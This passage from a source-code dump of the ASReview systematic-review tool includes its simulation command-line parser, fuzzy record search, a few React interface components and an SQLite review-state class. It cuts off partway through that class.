print(preview)\n\n print(\"Simulation started\\n\")\n reviewer.review()\n except Exception as err:\n # save the error to the project\n project.set_error(err)\n\n raise err\n\n print(\"\\nSimulation finished\")\n project.mark_review_finished()\n\n # create .ASReview file out of simulation folder\n if args.dataset != \"\":\n project.export(args.state_file)\n shutil.rmtree(fp_tmp_simulation)\n\n\nDESCRIPTION_SIMULATE = \"\"\"\nASReview for simulation.\n\nThe simulation modus is used to measure the performance of the ASReview\nsoftware on existing systematic reviews. The software shows how many\npapers you could have potentially skipped during the systematic\nreview.\"\"\"\n\n\ndef _simulate_parser(prog=\"simulate\", description=DESCRIPTION_SIMULATE):\n\n # parse arguments if available\n parser = argparse.ArgumentParser(\n prog=prog,\n description=description,\n formatter_class=argparse.RawTextHelpFormatter\n )\n\n # Active learning parameters\n # File path to the data.\n parser.add_argument(\n \"dataset\",\n type=str,\n help=\"File path to the dataset or one of the benchmark datasets.\",\n )\n # Initial data (prior knowledge)\n parser.add_argument(\n \"--n_prior_included\",\n default=DEFAULT_N_PRIOR_INCLUDED,\n type=int,\n help=\"Sample n prior included papers. \"\n \"Only used when --prior_idx is not given. \"\n f\"Default {DEFAULT_N_PRIOR_INCLUDED}\",\n )\n\n parser.add_argument(\n \"--n_prior_excluded\",\n default=DEFAULT_N_PRIOR_EXCLUDED,\n type=int,\n help=\"Sample n prior excluded papers. \"\n \"Only used when --prior_idx is not given. \"\n f\"Default {DEFAULT_N_PRIOR_EXCLUDED}\",\n )\n\n parser.add_argument(\n \"--prior_idx\",\n default=[],\n nargs=\"*\",\n type=int,\n help=\"Prior indices by rownumber (0 is first rownumber).\",\n )\n parser.add_argument(\n \"--prior_record_id\",\n default=[],\n nargs=\"*\",\n type=int,\n help=\"Prior indices by record_id.\",\n )\n # logging and verbosity\n parser.add_argument(\n \"--state_file\",\n \"-s\",\n default=None,\n type=str,\n help=\"Location to ASReview project file of simulation.\",\n )\n parser.add_argument(\n \"-m\",\n \"--model\",\n type=str,\n default=DEFAULT_MODEL,\n help=f\"The prediction model for Active Learning. \"\n f\"Default: '{DEFAULT_MODEL}'.\",\n )\n parser.add_argument(\n \"-q\",\n \"--query_strategy\",\n type=str,\n default=DEFAULT_QUERY_STRATEGY,\n help=f\"The query strategy for Active Learning. \"\n f\"Default: '{DEFAULT_QUERY_STRATEGY}'.\",\n )\n parser.add_argument(\n \"-b\",\n \"--balance_strategy\",\n type=str,\n default=DEFAULT_BALANCE_STRATEGY,\n help=\"Data rebalancing strategy mainly for RNN methods. Helps against\"\n \" imbalanced dataset with few inclusions and many exclusions. \"\n f\"Default: '{DEFAULT_BALANCE_STRATEGY}'\",\n )\n parser.add_argument(\n \"-e\",\n \"--feature_extraction\",\n type=str,\n default=DEFAULT_FEATURE_EXTRACTION,\n help=\"Feature extraction method. Some combinations of feature\"\n \" extraction method and prediction model are impossible/ill\"\n \" advised.\"\n f\"Default: '{DEFAULT_FEATURE_EXTRACTION}'\",\n )\n parser.add_argument(\n \"--init_seed\",\n default=None,\n type=int,\n help=\"Seed for setting the prior indices if the --prior_idx option is \"\n \"not used. If the option --prior_idx is used with one or more \"\n \"index, this option is ignored.\",\n )\n parser.add_argument(\n \"--seed\",\n default=None,\n type=int,\n help=\"Seed for the model (classifiers, balance strategies, \"\n \"feature extraction techniques, and query strategies).\",\n )\n parser.add_argument(\n \"--config_file\",\n type=str,\n default=None,\n help=\"Configuration file with model settings\" \"and parameter values.\",\n )\n parser.add_argument(\n \"--n_instances\",\n default=DEFAULT_N_INSTANCES,\n type=int,\n help=\"Number of papers queried each query.\" f\"Default {DEFAULT_N_INSTANCES}.\",\n )\n parser.add_argument(\n \"--n_queries\",\n type=type_n_queries,\n default=\"min\",\n help=\"Deprecated, use 'stop_if' instead.\",\n )\n parser.add_argument(\n \"--stop_if\",\n type=type_n_queries,\n default=\"min\",\n help=\"The number of label actions to simulate. Default, 'min' \"\n \"will stop simulating when all relevant records are found. Use -1 \"\n \"to simulate all labels actions.\",\n )\n parser.add_argument(\n \"-n\",\n \"--n_papers\",\n type=int,\n default=None,\n help=\"Deprecated, use 'stop_if' instead.\",\n )\n parser.add_argument(\"--verbose\", \"-v\", default=0, type=int, help=\"Verbosity\")\n parser.add_argument(\n \"--write_interval\",\n \"-w\",\n default=None,\n type=int,\n help=\"The simulation data will be written after each set of this\"\n \"many labeled records. By default only writes data at the end\"\n \"of the simulation to make it as fast as possible.\",\n )\n parser.add_argument(\n \"--embedding\",\n type=str,\n default=None,\n dest=\"embedding_fp\",\n help=\"File path of embedding matrix. Required for LSTM models.\",\n )\n return parser\n" }, { "alpha_fraction": 0.7523770332336426, "alphanum_fraction": 0.757337749004364, "avg_line_length": 35.10447692871094, "blob_id": "0678546f79f4e44487df1608a24c73398b7f7782", "content_id": "7f4b46d828887dc0607f7d065aca998e2f19bb73", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2419, "license_type": "permissive", "max_line_length": 109, "num_lines": 67, "path": "/asreview/__init__.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom asreview.data.base import ASReviewData\nfrom asreview.data.base import load_data\nfrom asreview.io.utils import list_readers\nfrom asreview.io.utils import list_writers\nfrom asreview.project import ASReviewProject\nfrom asreview.project import open_state\nfrom asreview.utils import asreview_path\nfrom asreview.utils import get_data_home\n\nfrom ._version import get_versions\n\n__version__ = get_versions()[\"version\"]\ndel get_versions\n\n__all__ = [\n \"asreview_path\",\n \"ASReviewData\",\n \"ASReviewProject\",\n \"get_data_home\",\n \"list_readers\",\n \"list_writers\",\n \"open_state\",\n]\n\n# deprecated in __init__.py, use asreview.models.feature_extraction instead\nfrom asreview._deprecated import _deprecated_func\nfrom asreview.models.feature_extraction.embedding_lstm import load_embedding as _load_embedding # NOQA\nfrom asreview.models.feature_extraction.embedding_lstm import sample_embedding as _sample_embedding # NOQA\nfrom asreview.models.feature_extraction.embedding_lstm import text_to_features as _text_to_features # NOQA\n\n\n@_deprecated_func(\n \"Importing load_embedding from asreview.load_embedding is deprecated, \"\n \"use asreview.models.feature_extraction.load_embedding instead\"\n)\ndef load_embedding(*args, **kwargs):\n return _load_embedding(*args, **kwargs)\n\n\n@_deprecated_func(\n \"Importing sample_embedding from asreview.sample_embedding is deprecated, \"\n \"use asreview.models.feature_extraction.sample_embedding instead\"\n)\ndef sample_embedding(*args, **kwargs):\n return _sample_embedding(*args, **kwargs)\n\n\n@_deprecated_func(\n \"Importing text_to_features from asreview.text_to_features is deprecated, \"\n \"use asreview.models.feature_extraction.text_to_features instead\"\n)\ndef text_to_features(*args, **kwargs):\n return _text_to_features(*args, **kwargs)\n" }, { "alpha_fraction": 0.568730354309082, "alphanum_fraction": 0.5729275941848755, "avg_line_length": 22.2439022064209, "blob_id": "beef729d6e55671cff53cd2195d4072568ad4c44", "content_id": "2b375ac812ec5af52a0eb608e9fd510216c460b6", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 953, "license_type": "permissive", "max_line_length": 72, "num_lines": 41, "path": "/asreview/webapp/src/ProjectComponents/TeamComponents/TeamPage.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport { Box, Fade } from \"@mui/material\";\nimport { styled } from \"@mui/material/styles\";\n\nimport { PageHeader } from \"../../Components\";\nimport { EndCollaboration, InvitationContents } from \".\";\n\nconst PREFIX = \"TeamPage\";\n\nconst classes = {\n cardWrapper: `${PREFIX}-card-wrapper`,\n};\n\nconst Root = styled(\"div\")(({ theme }) => ({\n [`& .${classes.cardWrapper}`]: {\n paddingTop: 32,\n [theme.breakpoints.down(\"md\")]: {\n paddingLeft: 0,\n paddingRight: 0,\n },\n },\n}));\n\nconst TeamPage = (props) => {\n return (\n <Root aria-label=\"history page\">\n <Fade in>\n <Box>\n <PageHeader header=\"Team\" mobileScreen={props.mobileScreen} />\n\n <Box className=\"main-page-body-wrapper\">\n {props.isOwner && <InvitationContents />}\n {!props.isOwner && <EndCollaboration />}\n </Box>\n </Box>\n </Fade>\n </Root>\n );\n};\n\nexport default TeamPage;\n" }, { "alpha_fraction": 0.581935465335846, "alphanum_fraction": 0.5845161080360413, "avg_line_length": 28.80769157409668, "blob_id": "85de202ad1c2f7fd91ae1071d97e16386b8a1993", "content_id": "c10d8bf7e336beb91c398ff048e4463557fb74ed", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 775, "license_type": "permissive", "max_line_length": 74, "num_lines": 26, "path": "/asreview/webapp/src/ProjectComponents/TeamComponents/DialogHeader.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import { DialogTitle, Stack, Tooltip } from \"@mui/material\";\nimport { Close } from \"@mui/icons-material\";\nimport { StyledIconButton } from \"../../StyledComponents/StyledButton.js\";\n\nconst DialogHeader = (props) => {\n return (\n <Stack className=\"dialog-header\" direction=\"row\">\n <DialogTitle>{props.title}</DialogTitle>\n <Stack direction=\"row\" spacing={1} sx={{ alignItems: \"center\" }}>\n <Stack\n className=\"dialog-header-button right\"\n direction=\"row\"\n spacing={1}\n >\n <Tooltip title=\"Close\">\n <StyledIconButton onClick={props.handleClose}>\n <Close />\n </StyledIconButton>\n </Tooltip>\n </Stack>\n </Stack>\n </Stack>\n );\n};\n\nexport default DialogHeader;\n" }, { "alpha_fraction": 0.5450000166893005, "alphanum_fraction": 0.5450000166893005, "avg_line_length": 22.255813598632812, "blob_id": "d4d5af325107e953ea76030a3ce8e5e759ebe6e1", "content_id": "bbcf08f5df63caa7451900929c30db64eb21a6b9", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1000, "license_type": "permissive", "max_line_length": 70, "num_lines": 43, "path": "/asreview/webapp/src/Components/PersistSignIn.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport { useQuery } from \"react-query\";\nimport { Navigate, Outlet, useLocation } from \"react-router-dom\";\nimport useAuth from \"../hooks/useAuth\";\n\nimport { AuthAPI } from \"../api\";\n\nconst PersistSignIn = () => {\n const location = useLocation();\n const { auth, setAuth } = useAuth();\n const [isLoading, setIsLoading] = React.useState(\n !auth?.logged_in ? true : false,\n );\n\n const { isError } = useQuery(\"refresh\", AuthAPI.refresh, {\n enabled: isLoading,\n onSettled: () => {\n setIsLoading(false);\n },\n onSuccess: (data) => {\n setAuth((prev) => {\n return {\n ...prev,\n logged_in: data.logged_in,\n name: data.name,\n id: data.id,\n };\n });\n },\n retry: false,\n });\n\n return (\n <>\n {!isError && (isLoading ? null : <Outlet />)}\n {isError && (\n <Navigate to={\"/signin\"} state={{ from: location }} replace />\n )}\n </>\n );\n};\n\nexport default PersistSignIn;\n" }, { "alpha_fraction": 0.6130550503730774, "alphanum_fraction": 0.6187845468521118, "avg_line_length": 28.79878044128418, "blob_id": "9a62717cabf0c679ac3f7848765c6b86bef3299f", "content_id": "2cf852ff5b9befef58e42292b0374a972adaa791", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4887, "license_type": "permissive", "max_line_length": 79, "num_lines": 164, "path": "/asreview/search.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport re\nfrom difflib import SequenceMatcher\n\nimport numpy as np\n\nfrom asreview.utils import format_to_str\n\n\nclass SearchError(Exception):\n pass\n\n\ndef _create_inverted_index(match_strings):\n index = {}\n word = re.compile(r\"['\\w]+\")\n for i, match in enumerate(match_strings):\n tokens = word.findall(match.lower())\n for token in tokens:\n if token in index:\n if index[token][-1] != i:\n index[token].append(i)\n else:\n index[token] = [i]\n return index\n\n\ndef _match_best(keywords, index, match_strings, threshold=0.75):\n n_match = len(match_strings)\n word = re.compile(r\"['\\w]+\")\n key_list = word.findall(keywords.lower())\n\n ratios = np.zeros(n_match)\n for key in key_list:\n cur_ratios = {}\n s = SequenceMatcher()\n s.set_seq2(key)\n for token in index:\n s.set_seq1(token)\n ratio = s.quick_ratio()\n if ratio < threshold:\n continue\n for idx in index[token]:\n if ratio > cur_ratios.get(idx, 0.0):\n cur_ratios[idx] = ratio\n\n for idx, rat in cur_ratios.items():\n ratios[idx] += rat\n\n return (100 * ratios) / len(key_list)\n\n\ndef _get_fuzzy_scores(keywords, match_strings):\n \"\"\"Rank a list of strings, depending on a set of keywords.\n\n Arguments\n ---------\n keywords: str\n Keywords that we are trying to find in the string list.\n str_list: list\n List of strings that should be scored according to the keywords.\n\n Returns\n -------\n numpy.ndarray\n Array of scores ordered in the same way as the str_list input.\n \"\"\"\n inv_index = _create_inverted_index(match_strings)\n return _match_best(keywords, inv_index, match_strings)\n\n\ndef _match_string(as_data):\n match_str = np.full(len(as_data), \"x\", dtype=object)\n\n all_titles = as_data.title\n all_authors = as_data.authors\n all_keywords = as_data.keywords\n\n if all_titles is None:\n raise SearchError(\"Cannot search dataset without titles.\")\n\n for i in range(len(as_data)):\n match_list = []\n\n # add titles\n match_list.append(all_titles[i])\n\n # add authors if present\n if all_authors is not None:\n match_list.append(format_to_str(all_authors[i]))\n\n # add keywords if present\n if all_keywords is not None:\n match_list.append(format_to_str(all_keywords[i]))\n\n match_str[i,] = \" \".join(match_list)\n return match_str\n\n\ndef fuzzy_find(\n as_data, keywords, threshold=60, max_return=10, exclude=None, by_index=True\n):\n \"\"\"Find a record using keywords.\n\n It looks for keywords in the title/authors/keywords\n (for as much is available). Using the diflib package it creates\n a ranking based on token set matching.\n\n Arguments\n ---------\n as_data: asreview.data.ASReviewData\n ASReview data object to search\n keywords: str\n A string of keywords together, can be a combination.\n threshold: float\n Don't return records below this threshold.\n max_return: int\n Maximum number of records to return.\n exclude: list, numpy.ndarray\n List of indices that should be excluded in the search. You would\n put papers that were already labeled here for example.\n by_index: bool\n If True, use internal indexing.\n If False, use record ids for indexing.\n\n Returns\n -------\n list\n Sorted list of indexes that match best the keywords.\n \"\"\"\n new_ranking = _get_fuzzy_scores(keywords, _match_string(as_data))\n sorted_idx = np.argsort(-new_ranking)\n best_idx = []\n if exclude is None:\n exclude = np.array([], dtype=int)\n for idx in sorted_idx:\n if (\n (not by_index and as_data.df.index.values[idx] in exclude)\n or by_index\n and idx in exclude\n ):\n continue\n if len(best_idx) >= max_return:\n break\n if len(best_idx) > 0 and new_ranking[idx] < threshold:\n break\n best_idx.append(idx)\n fuzz_idx = np.array(best_idx, dtype=int)\n if not by_index:\n fuzz_idx = as_data.df.index.values[fuzz_idx]\n return fuzz_idx.tolist()\n" }, { "alpha_fraction": 0.5487911105155945, "alphanum_fraction": 0.5504123568534851, "avg_line_length": 32.09408950805664, "blob_id": "83afd54475a5799a4385c788f8bc781debaa8300", "content_id": "cf42e3a00cd6e04557db401337000bfe98287f72", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 42559, "license_type": "permissive", "max_line_length": 88, "num_lines": 1286, "path": "/asreview/state/sqlstate.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport json\nimport sqlite3\nfrom datetime import datetime\nfrom pathlib import Path\n\nimport pandas as pd\n\nfrom asreview._version import get_versions\nfrom asreview.settings import ASReviewSettings\nfrom asreview.state.base import BaseState\nfrom asreview.state.errors import StateError\nfrom asreview.state.errors import StateNotFoundError\n\nREQUIRED_TABLES = [\n # the table with the labeling decisions and models trained\n \"results\",\n # the mapping of record identifiers to row numbers\n \"record_table\",\n # the latest probabilities.\n \"last_probabilities\",\n # the latest ranking.\n \"last_ranking\",\n # the record ids whose labeling decision was changed.\n \"decision_changes\",\n]\n\nRESULTS_TABLE_COLUMNS = [\n \"record_id\",\n \"label\",\n \"classifier\",\n \"query_strategy\",\n \"balance_strategy\",\n \"feature_extraction\",\n \"training_set\",\n \"labeling_time\",\n \"notes\",\n]\nSETTINGS_METADATA_KEYS = [\n \"settings\",\n \"state_version\",\n \"software_version\",\n \"model_has_trained\",\n]\n\n\nclass SQLiteState(BaseState):\n \"\"\"Class for storing the review state.\n\n The results are stored in a sqlite database.\n\n Arguments\n ---------\n read_only: bool\n Open state in read only mode. Default False.\n\n Attributes\n ----------\n version: str\n Return the version number of the state.\n settings: asreview.settings.ASReviewSettings\n Return an ASReview settings object with model settings and\n active learning settings.\n n_records_labeled: int\n Get the number of labeled records, where each prior is counted\n individually.\n n_priors: int\n Number of priors. If priors have not been selected returns None.\n exist_new_labeled_records: bool\n Have there been labeled records added to the state since the last time\n a model ranking was added to the state?\n model_has_trained: bool\n Has the ranking by a model been added to the state?\n \"\"\"\n\n def __init__(self, read_only=True):\n super(SQLiteState, self).__init__(read_only=read_only)\n\n # INTERNAL PATHS AND CONNECTIONS\n\n def _connect_to_sql(self):\n \"\"\"Get a connection to the SQLite database.\n\n Returns\n -------\n sqlite3.Connection\n Connection to the the SQLite database.\n The connection is read only if self.read_only is true.\n \"\"\"\n if self.read_only:\n con = sqlite3.connect(f\"file:{str(self._sql_fp)}?mode=ro\", uri=True)\n else:\n con = sqlite3.connect(str(self._sql_fp))\n return con\n\n @property\n def _sql_fp(self):\n \"\"\"Get the path to the sqlite database.\"\"\"\n\n return Path(self.review_dir, \"results.sql\")\n\n @property\n def _settings_metadata_fp(self):\n \"\"\"Get the path to the settings and metadata json file.\"\"\"\n\n return Path(self.review_dir, \"settings_metadata.json\")\n\n def _create_new_state_file(self, working_dir, review_id):\n \"\"\"Create the files for storing a new state given an review_id.\n\n Stages:\n 1: create result structure\n 2: create model settings\n 3: add state to the project file\n\n Arguments\n ---------\n review_dir: str, pathlib.Path\n Review folder location.\n review_id: str\n Identifier of the review.\n \"\"\"\n if self.read_only:\n raise ValueError(\"Can't create new state file in read_only mode.\")\n\n self.review_dir = Path(working_dir, \"reviews\", review_id)\n\n # create folder in the folder `results` with the name of result_id\n self._sql_fp.parent.mkdir(parents=True, exist_ok=True)\n\n # Create results table.\n con = self._connect_to_sql()\n try:\n cur = con.cursor()\n\n # Create the results table.\n cur.execute(\n \"\"\"CREATE TABLE results\n (record_id INTEGER,\n label INTEGER,\n classifier TEXT,\n query_strategy TEXT,\n balance_strategy TEXT,\n feature_extraction TEXT,\n training_set INTEGER,\n labeling_time INTEGER,\n notes TEXT)\"\"\"\n )\n\n # Create the record table.\n cur.execute(\n \"\"\"CREATE TABLE record_table\n (record_id INT)\"\"\"\n )\n\n # Create the last_probabilities table.\n cur.execute(\n \"\"\"CREATE TABLE last_probabilities\n (proba REAL)\"\"\"\n )\n\n # Create the last_ranking table.\n cur.execute(\n \"\"\"CREATE TABLE last_ranking\n (record_id INTEGER,\n ranking INT,\n classifier TEXT,\n query_strategy TEXT,\n balance_strategy TEXT,\n feature_extraction TEXT,\n training_set INTEGER,\n time INTEGER)\"\"\"\n )\n\n # Create the table of changed decisions.\n cur.execute(\n \"\"\"CREATE TABLE decision_changes\n (record_id INTEGER,\n new_label INTEGER,\n time INTEGER)\"\"\"\n )\n\n con.commit()\n con.close()\n except sqlite3.Error as e:\n con.close()\n raise e\n\n # Create settings_metadata.json file\n # content of the settings is added later\n self.settings_metadata = {\n \"settings\": None,\n \"state_version\": \"1\",\n \"software_version\": get_versions()[\"version\"],\n \"model_has_trained\": False,\n }\n\n with open(self._settings_metadata_fp, \"w\") as f:\n json.dump(self.settings_metadata, f)\n\n def _restore(self, working_dir, review_id):\n \"\"\"\n Restore a state from files.\n\n Arguments\n ---------\n review_dir: str, pathlib.Path\n Review folder location.\n review_id: str\n Identifier of the review.\n \"\"\"\n # store filepath\n self.review_dir = Path(working_dir, \"reviews\", review_id)\n\n # If state already exist\n if not working_dir.is_dir():\n raise StateNotFoundError(f\"Project {working_dir} doesn't exist.\")\n\n if not self._sql_fp.parent.is_dir():\n raise StateNotFoundError(f\"Review with id {review_id} doesn't exist.\")\n\n # Cache the settings.\n try:\n with open(self._settings_metadata_fp, \"r\") as f:\n self.settings_metadata = json.load(f)\n except FileNotFoundError:\n raise AttributeError(\n \"'settings_metadata.json' not found in the state file.\"\n )\n\n try:\n if not self._is_valid_version():\n raise ValueError(\n f\"State cannot be read: state version {self.version}, \"\n f\"state file version {self.version}.\"\n )\n except AttributeError as err:\n raise ValueError(f\"Unexpected error when opening state file: {err}\")\n\n self._is_valid_state()\n\n def _is_valid_state(self):\n con = self._connect_to_sql()\n cur = con.cursor()\n column_names = cur.execute(\"PRAGMA table_info(results)\").fetchall()\n table_names = cur.execute(\n \"SELECT name FROM sqlite_master WHERE type='table';\"\n ).fetchall()\n con.close()\n\n # Check if all required tables are present.\n table_names = [tup[0] for tup in table_names]\n missing_tables = [\n table for table in REQUIRED_TABLES if table not in table_names\n ]\n if missing_tables:\n raise StateError(\n f\"The SQL file should contain tables named \"\n f\"'{' '.join(missing_tables)}'.\"\n )\n\n # Check if all required columns are present in results.\n column_names = [tup[1] for tup in column_names]\n missing_columns = [\n col for col in RESULTS_TABLE_COLUMNS if col not in column_names\n ]\n if missing_columns:\n raise StateError(\n f\"The results table does not contain the columns \"\n f\"{' '.join(missing_columns)}.\"\n )\n\n # Check settings_metadata contains the required keys.\n missing_keys = [\n key\n for key in SETTINGS_METADATA_KEYS\n if key not in self.settings_metadata.keys()\n ]\n if missing_keys:\n raise StateError(\n f\"The keys {' '.join(missing_keys)} were not found in \"\n f\"settings_metadata.\"\n )\n\n def close(self):\n pass\n\n # PROPERTIES\n\n def _is_valid_version(self):\n \"\"\"Check compatibility of state version.\"\"\"\n return self.version[0] == \"1\"\n\n @property\n def version(self):\n \"\"\"Version number of the state.\n\n Returns\n -------\n str:\n Returns the version of the state.\n\n \"\"\"\n try:\n return self.settings_metadata[\"state_version\"]\n except KeyError:\n raise AttributeError(\n \"'settings_metadata.json' does not contain 'state_version'.\"\n )\n\n @property\n def settings(self):\n \"\"\"Settings of the ASReview pipeline.\n\n Example\n -------\n\n Example of settings.\n\n model : nb\n query_strategy : max_random\n balance_strategy : triple\n feature_extraction: tfidf\n n_instances : 1\n stop_if : min\n n_prior_included : 10\n n_prior_excluded : 10\n mode : simulate\n model_param : {'alpha': 3.822}\n query_param : {'strategy_1': 'max', 'strategy_2': 'random',\n 'mix_ratio': 0.95}\n feature_param : {}\n balance_param : {'a': 2.155, 'alpha': 0.94, ... 'gamma': 2.0,\n 'shuffle': True}\n abstract_only : False\n\n \"\"\"\n settings = self.settings_metadata[\"settings\"]\n if settings is None:\n return None\n return ASReviewSettings(**settings)\n\n @settings.setter\n def settings(self, settings):\n if isinstance(settings, ASReviewSettings):\n self._add_settings_metadata(\"settings\", settings.to_dict())\n else:\n raise ValueError(\"'settings' should be an ASReviewSettings object.\")\n\n @property\n def n_records(self):\n \"\"\"Number of records in the loop.\n\n Returns\n -------\n int\n Number of records.\n \"\"\"\n con = self._connect_to_sql()\n cur = con.cursor()\n cur.execute(\"SELECT COUNT (*) FROM record_table\")\n n = cur.fetchone()[0]\n con.close()\n\n return n\n\n @property\n def n_records_labeled(self):\n \"\"\"Number labeled records.\n\n Returns\n -------\n int\n Number of labeled records, priors counted individually.\n \"\"\"\n labeled = self.get_labeled()\n return len(labeled)\n\n @property\n def n_priors(self):\n \"\"\"Number of records added as prior knowledge.\n\n Returns\n -------\n int\n Number of records which were added as prior knowledge.\n \"\"\"\n con = self._connect_to_sql()\n cur = con.cursor()\n cur.execute(\"SELECT COUNT (*) FROM results WHERE query_strategy='prior'\")\n n = cur.fetchone()\n con.close()\n n = n[0]\n\n if n == 0:\n return None\n return n\n\n @property\n def exist_new_labeled_records(self):\n \"\"\"Return True if there are new labeled records.\n\n Return True if there are any record labels added since the last time\n the model ranking was added to the state. Also returns True if no\n model was trained yet, but priors have been added.\n \"\"\"\n labeled = self.get_labeled()\n last_training_set = self.get_last_ranking()[\"training_set\"]\n if last_training_set.empty:\n return len(labeled) > 0\n else:\n return len(labeled) > last_training_set.iloc[0]\n\n @property\n def model_has_trained(self):\n \"\"\"Return True if there is data of a trained model in the state.\"\"\"\n return self.settings_metadata[\"model_has_trained\"]\n\n def _add_settings_metadata(self, key, value):\n \"\"\"Add information to the settings_metadata dictionary.\"\"\"\n if self.read_only:\n raise ValueError(\"Can't change settings in read only mode.\")\n self.settings_metadata[key] = value\n\n with open(self._settings_metadata_fp, \"w\") as f:\n json.dump(self.settings_metadata, f)\n\n def add_record_table(self, record_ids):\n \"\"\"Add the record table to the state.\n\n Arguments\n ---------\n record_ids: list, np.array\n List containing all record ids of the dataset.\n \"\"\"\n record_sql_input = [(int(record_id),) for record_id in record_ids]\n\n con = self._connect_to_sql()\n cur = con.cursor()\n cur.execute(\"DELETE FROM record_table\")\n cur.executemany(\n \"INSERT INTO record_table (record_id) VALUES (?)\", record_sql_input\n )\n con.commit()\n\n def add_last_probabilities(self, probabilities):\n \"\"\"Save the probabilities produced by the last classifier.\n\n Arguments\n ---------\n probabilities: list, np.array\n List containing the probabilities for every record.\n \"\"\"\n proba_sql_input = [(proba,) for proba in probabilities]\n\n con = self._connect_to_sql()\n cur = con.cursor()\n\n # Check that the number of rows in the table is 0 (if the table is not\n # yet populated), or that it's equal to len(probabilities).\n cur.execute(\"SELECT COUNT (*) FROM last_probabilities\")\n proba_length = cur.fetchone()[0]\n if not ((proba_length == 0) or (proba_length == len(proba_sql_input))):\n raise ValueError(\n f\"There are {proba_length} probabilities in the database, \"\n f\"but 'probabilities' has length {len(probabilities)}\"\n )\n\n cur.execute(\"\"\"DELETE FROM last_probabilities\"\"\")\n cur.executemany(\n \"INSERT INTO last_probabilities (proba) VALUES (?)\", proba_sql_input\n )\n con.commit()\n\n def add_last_ranking(\n self,\n ranked_record_ids,\n classifier,\n query_strategy,\n balance_strategy,\n feature_extraction,\n training_set,\n ):\n \"\"\"Save the ranking of the last iteration of the model.\n\n Save the ranking of the last iteration of the model, in the ranking\n order, so the record on row 0 is ranked first by the model.\n\n Arguments\n ---------\n ranked_record_ids: list, numpy.ndarray\n A list of records ids in the order that they were ranked.\n classifier: str\n Name of the classifier of the model.\n query_strategy: str\n Name of the query strategy of the model.\n balance_strategy: str\n Name of the balance strategy of the model.\n feature_extraction: str\n Name of the feature extraction method of the model.\n training_set: int\n Number of labeled records available at the time of training.\n \"\"\"\n record_ids = self.get_record_table()\n\n if len(record_ids) != len(ranked_record_ids):\n raise ValueError(\n \"The ranking should have the same length as the \" \"record table.\"\n )\n\n ranking = range(len(record_ids))\n classifiers = [classifier for _ in record_ids]\n query_strategies = [query_strategy for _ in record_ids]\n balance_strategies = [balance_strategy for _ in record_ids]\n feature_extractions = [feature_extraction for _ in record_ids]\n training_sets = [int(training_set) for _ in record_ids]\n ranking_times = [datetime.now()] * len(record_ids)\n\n # Create the database rows.\n db_rows = [\n (\n int(ranked_record_ids[i]),\n int(ranking[i]),\n classifiers[i],\n query_strategies[i],\n balance_strategies[i],\n feature_extractions[i],\n training_sets[i],\n ranking_times[i],\n )\n for i in range(len(record_ids))\n ]\n\n con = self._connect_to_sql()\n cur = con.cursor()\n cur.execute(\"DELETE FROM last_ranking\")\n cur.executemany(\n (\n \"INSERT INTO last_ranking (record_id, ranking, classifier, \"\n \"query_strategy, balance_strategy, feature_extraction, \"\n \"training_set, time) VALUES (?, ?, ?, ?, ?, ?, ?, ?)\"\n ),\n db_rows,\n )\n con.commit()\n con.close()\n\n # If it's the first ranking table to be added, set model_has_trained.\n if not self.model_has_trained:\n self._add_settings_metadata(\"model_has_trained\", True)\n\n def add_note(self, note, record_id):\n \"\"\"Add a text note to save with a labeled record.\n\n Arguments\n ---------\n note: str\n Text note to save.\n record_id: int\n Identifier of the record to which the note should be added.\n \"\"\"\n con = self._connect_to_sql()\n cur = con.cursor()\n cur.execute(\n \"UPDATE results SET notes = ? WHERE record_id = ?\", (note, record_id)\n )\n con.commit()\n con.close()\n\n def add_labeling_data(self, record_ids, labels, notes=None, prior=False):\n \"\"\"Add the data corresponding to a labeling action to the state file.\n\n Arguments\n ---------\n record_ids: list, numpy.ndarray\n A list of ids of the labeled records as int.\n labels: list, numpy.ndarray\n A list of labels of the labeled records as int.\n notes: list of str/None\n A list of text notes to save with the labeled records.\n prior: bool\n Whether the added record are prior knowledge.\n \"\"\"\n\n # Check if the state is still valid.\n 